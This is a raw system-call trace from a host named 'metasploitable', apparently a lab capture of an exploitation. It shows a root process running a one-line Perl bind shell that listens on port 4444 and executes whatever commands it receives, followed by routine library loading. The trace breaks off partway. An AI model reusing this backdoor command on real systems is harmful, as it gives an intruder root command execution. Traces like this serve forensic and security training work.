12718 07:43:48.593797 close(1)          = 0

12718 07:43:48.593824 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12718 07:43:48.593838 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12718 07:43:48.593853 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12718 07:43:48.593987 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12718 07:43:48.594021 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de4000

12718 07:43:48.594048 mmap2(0xb7ded000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7ded000

12718 07:43:48.594077 close(1)          = 0

12718 07:43:48.594098 munmap(0xb7f9f000, 29913) = 0

12718 07:43:48.594114 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12718 07:43:48.594128 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12718 07:43:48.594141 _llseek(1, 0, [0], SEEK_CUR) = 0

12718 07:43:48.594152 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12718 07:43:48.594168 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fa6000

12718 07:43:48.594178 _llseek(1, 1624, [1624], SEEK_SET) = 0

12718 07:43:48.594193 munmap(0xb7fa6000, 1624) = 0

12718 07:43:48.594202 close(1)          = 0

12718 07:43:48.594229 getpgrp()         = 3831

12718 07:43:48.594239 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12718 07:43:48.594254 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12718 07:43:48.594269 brk(0x8101000)    = 0x8101000

12718 07:43:48.594299 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12718 07:43:48.594313 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12718 07:43:48.594327 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12718 07:43:48.594363 brk(0x8102000)    = 0x8102000

12718 07:43:48.594388 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12718 07:43:48.594407 stat64("/sbin/AB", 0xbfd823d8) = -1 ENOENT (No such file or directory)

12718 07:43:48.594419 stat64("/bin/AB", 0xbfd823d8) = -1 ENOENT (No such file or directory)

12718 07:43:48.594433 stat64("/usr/sbin/AB", 0xbfd823d8) = -1 ENOENT (No such file or directory)

12718 07:43:48.594444 stat64("/usr/bin/AB", 0xbfd823d8) = -1 ENOENT (No such file or directory)

12718 07:43:48.594508 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12718 07:43:48.594538 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e1a6f8) = 12719

12719 07:43:48.594587 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12719 07:43:48.594617 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12719 07:43:48.594629 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12719 07:43:48.594641 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12719 07:43:48.594656 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12719 07:43:48.594671 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12719 07:43:48.594683 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12719 07:43:48.594739 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12719 07:43:48.594753 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12719 07:43:48.594819 exit_group(127)   = ?

12718 07:43:48.639607 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:43:48.639665 waitpid(12718,  <unfinished ...>

12718 07:43:48.639675 <... rt_sigprocmask resumed> NULL, 8) = 0

12718 07:43:48.639682 --- SIGCHLD (Child exited) @ 0 (0) ---

12718 07:43:48.639697 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12719

12718 07:43:48.639715 waitpid(-1, 0xbfd82058, WNOHANG) = -1 ECHILD (No child processes)

12718 07:43:48.639725 sigreturn()       = ? (mask now [])

12718 07:43:48.639749 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12718 07:43:48.639764 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12718 07:43:48.639775 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12718 07:43:48.639787 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12718 07:43:48.639805 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12718 07:43:48.639816 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12718 07:43:48.639852 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12718 07:43:48.639872 stat64("/sbin/perl", 0xbfd82408) = -1 ENOENT (No such file or directory)

12718 07:43:48.639884 stat64("/bin/perl", 0xbfd82408) = -1 ENOENT (No such file or directory)

12718 07:43:48.639895 stat64("/usr/sbin/perl", 0xbfd82408) = -1 ENOENT (No such file or directory)

12718 07:43:48.639907 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12718 07:43:48.639924 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12718 07:43:48.639949 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12718 07:43:48.639964 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e1a6f8) = 12720

12720 07:43:48.640012 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12720 07:43:48.640028 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12720 07:43:48.640041 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12720 07:43:48.640067 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12720 07:43:48.640100 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12720 07:43:48.640132 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12720 07:43:48.640159 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12720 07:43:48.640193 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12720 07:43:48.640290 brk(0)            = 0x8153000

12720 07:43:48.640311 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.640326 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f28000

12720 07:43:48.640342 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.640359 open("/etc/ld.so.cache", O_RDONLY) = 1

12720 07:43:48.640371 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12720 07:43:48.640393 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f20000

12720 07:43:48.640404 close(1)          = 0

12720 07:43:48.640414 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.640429 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12720 07:43:48.640443 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12720 07:43:48.640577 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12720 07:43:48.640616 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1c000

12720 07:43:48.640643 mmap2(0xb7f1e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f1e000

12720 07:43:48.640676 close(1)          = 0

12720 07:43:48.640687 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.640701 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12720 07:43:48.640714 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12720 07:43:48.640800 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12720 07:43:48.640817 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef7000

12720 07:43:48.640827 mmap2(0xb7f1a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f1a000

12720 07:43:48.640843 close(1)          = 0

12720 07:43:48.640854 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.640867 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12720 07:43:48.640881 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12720 07:43:48.640969 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12720 07:43:48.640985 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

12720 07:43:48.640998 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ede000

12720 07:43:48.641008 mmap2(0xb7ef2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ef2000

12720 07:43:48.641022 mmap2(0xb7ef4000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef4000

12720 07:43:48.641035 close(1)          = 0

12720 07:43:48.641046 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.641074 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12720 07:43:48.641115 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12720 07:43:48.641236 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12720 07:43:48.641253 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8f000

12720 07:43:48.641264 mmap2(0xb7ed8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed8000

12720 07:43:48.641278 mmap2(0xb7edb000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edb000

12720 07:43:48.641291 close(1)          = 0

12720 07:43:48.641303 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12720 07:43:48.641316 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12720 07:43:48.641329 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12720 07:43:48.641419 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12720 07:43:48.641436 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5d000

12720 07:43:48.641446 mmap2(0xb7d66000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d66000

12720 07:43:48.641460 mmap2(0xb7d68000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d68000

12720 07:43:48.641473 close(1)          = 0

12720 07:43:48.641496 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d5c000

12720 07:43:48.641508 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d5c8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12720 07:43:48.641610 mprotect(0xb7ed8000, 4096, PROT_READ) = 0

12720 07:43:48.641683 munmap(0xb7f20000, 29913) = 0

12720 07:43:48.641701 set_tid_address(0xb7d5c908) = 12720

12720 07:43:48.641714 set_robust_list(0xb7d5c910, 0xc) = 0

12720 07:43:48.641724 futex(0xbfb3d7e0, 0x81 /* FUTEX_??? */, 1) = 0

12720 07:43:48.641738 rt_sigaction(SIGRTMIN, {0xb7ee22c0, [], SA_SIGINFO}, NULL, 8) = 0

12720 07:43:48.641751 rt_sigaction(SIGRT_1, {0xb7ee2340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12720 07:43:48.641763 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12720 07:43:48.641776 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12720 07:43:48.641795 uname({sys="Linux", node="metasploitable", ...}) = 0

12720 07:43:48.641840 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12720 07:43:48.641886 brk(0)            = 0x8153000

12720 07:43:48.641895 brk(0x8174000)    = 0x8174000

12720 07:43:48.641943 getuid32()        = 0

12720 07:43:48.641953 geteuid32()       = 0

12720 07:43:48.641961 getgid32()        = 0

12720 07:43:48.641970 getegid32()       = 0

12720 07:43:48.642006 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d3b000

12720 07:43:48.642033 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12720 07:43:48.642128 read(1, "\234F\312\270", 4) = 4

12720 07:43:48.642454 close(1)          = 0

12720 07:43:48.642595 time(NULL)        = 1495626228

12720 07:43:48.642707 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfb3d4b0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649607 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfb3d4b0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649622 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfb3d4b0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649638 stat64("/usr/local/lib/perl/5.8.7", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649651 stat64("/usr/local/share/perl/5.8.7", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649663 stat64("/usr/local/lib/perl/5.8.6", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649674 stat64("/usr/local/share/perl/5.8.6", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649686 stat64("/usr/local/lib/perl/5.8.4", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649697 stat64("/usr/local/share/perl/5.8.4", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

12720 07:43:48.649709 stat64("/usr/local/lib/perl/5.8.3", 0xbfb3d5f0) = -1 ENOENT (No such file or directory)

